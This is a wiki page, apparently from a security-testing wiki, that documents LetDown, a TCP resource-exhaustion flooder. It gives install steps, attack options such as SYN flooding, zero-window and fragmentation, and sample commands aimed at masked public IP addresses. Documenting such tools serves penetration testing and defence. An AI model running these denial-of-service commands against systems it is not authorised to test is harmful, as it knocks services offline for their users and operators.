Complemento/LetDown

From aldeid

Description

LetDown is a TCP flooder inspired by Fyodor's article "TCP Resource Exhaustion and Botched Disclosure" (http://insecure.org/stf/tcp-dos-attack-explained.html). It has an (experimental) userland TCP/IP stack and supports multistage payloads for complex protocols, packet fragmentation and a variable TCP window.

Installation

Download and uncompress

First, download Complemento:

$ mkdir -p /pentest/enumeration/
$ cd /pentest/enumeration/
$ wget http://downloads.sourceforge.net/project/complemento/complemento/complemento-0.7.6/complemento-0.7.6.tar.gz
$ tar xzvf complemento-0.7.6.tar.gz
$ cd complemento/letdown/

At this stage, check your version of Python:

$ python -V
Python 2.6.5

Python 2.5

If your version of Python is 2.5, you can directly compile:

$ make

Python 2.6

If you have Python 2.6, you need to apply this patch:

$ wget http://dl.dropbox.com/u/10761700/letdown-python2.6.patch
$ patch -p0 < letdown-python2.6.patch

Then you can compile:

$ make
Note
The make command will output warnings. They are only warnings, not errors, and do not block the build.

Usage

Basic syntax

$ sudo ./letdown -d destination ip -p port [options]
Note
LetDown requires root privileges.

Common Options

-d
destination ip address or dns name, target
-p
destination port
-s
source ip address
-x
first source port (default 1025)
-y
last source port (default 65534)
-l
enables infinite loop mode
-i
network interface
-t
sleep time in microseconds (default 10000)
-a
max time in seconds to wait for responses (default 40)

Extra options

-v
verbosity level (0=quiet, 1=normal, 2=verbose)
-f
automagically set firewall rules to block RST packets generated by the kernel
examples: -f iptables, -f blackhole (for freebsd)
-L
special interaction levels with the target
  • s: syn flooding, no 3-way-handshake
  • a: send acknowledgment packets (polite mode)
  • f: send finalize packets (include polite mode)
  • r: send reset packets (check firewall rules...)
-W
window size for ack packets (ex: 0-window attack)
-O
enable ack fragmentation and set fragment offset delta
-C
fragment counter if fragmentation is enabled (default 1)
-P
payload file (see payloads directory...)
-M
multistage payload file (see payloads directory...)

Examples

  • Generic attack
$ sudo ./letdown -d 208.xx.xx.xx -s 192.168.1.x -p 21
  • Attack against a webserver using payload and firewall options:
$ sudo ./letdown -d 208.xx.xx.xx -s 192.168.1.x -p 80 -f iptables -P payloads/http.txt
  • Connections from 3 ports < 1024 and with the time option:
$ sudo ./letdown -d 208.xx.xx.xx -s 192.168.1.x -p 80 -x 80 -y 100 -t 10000
